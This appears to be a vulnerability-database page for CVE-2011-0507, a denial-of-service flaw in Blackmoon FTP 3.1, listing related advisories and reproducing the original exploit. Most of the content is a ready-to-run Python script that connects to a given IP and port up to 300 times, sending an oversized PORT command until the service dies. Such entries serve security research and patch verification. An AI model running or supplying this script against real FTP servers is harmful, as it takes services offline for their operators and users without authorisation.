Lucene search
+L

Blackmoon FTP 3.1 Build 1735/1736 - Denial of Service

🗓️ 13 Jan 2011 00:00:00Reported by Craig FreymanType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 25 Views

Blackmoon FTP 3.1 Build 1735/1736 Denial of Service vulnerability through long PORT comman

Related
Code
ReporterTitlePublishedViews
Family
Tenable Nessus
BlackMoon FTP Server Denial of Service
20 Jan 201100:00
nessus
Circl
CVE-2011-0507
13 Jan 201100:00
circl
CVE
CVE-2011-0507
20 Jan 201118:00
cve
Cvelist
CVE-2011-0507
20 Jan 201118:00
cvelist
EUVD
EUVD-2011-0527
7 Oct 202500:30
euvd
NVD
CVE-2011-0507
20 Jan 201119:00
nvd
OpenVAS
Blackmoon FTP PORT Command Denial Of Service Vulnerability
21 Jan 201100:00
openvas
Prion
Null pointer dereference
20 Jan 201119:00
prion
#!/usr/bin/python

# Exploit Title: BlackmoonFTP Server DOS
# Date: 12/28/2010
# Author: Craig Freyman (cd1zz)
# Software Link: http://www.mediafire.com/?bnc4d00myymmx55
# Version: 3.1 Release 6 - Build 1735 and 1736
# Tested On: Windows XP SP3
# Vendor Contacted: 12/28/2010
# Vendor Fixed: 1/13/2011

import socket
import sys

buffer = '\x41' * 600

counter = 1

if len(sys.argv) != 3:
    	print "Usage: ./blackmoonDOS.py <ip> <port>"
        sys.exit()

ip   = sys.argv[1]
port = sys.argv[2]

while counter <= 300:
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	try:
		print "[*] Sending evil buffer. Count " + str(counter) + " out of 300"
		s.connect((ip,int(port)))
		s.recv(1024)
		s.send('PORT ' + buffer + '\r\n')
		s.recv(1024)
		s.send('QUIT \r\n')
		s.recv(1024)
		s.close()
		counter=counter+1
	except:
		print "Check the service - probably dead!"
		sys.exit()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Jan 2011 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 24.3
EPSS0.04918
25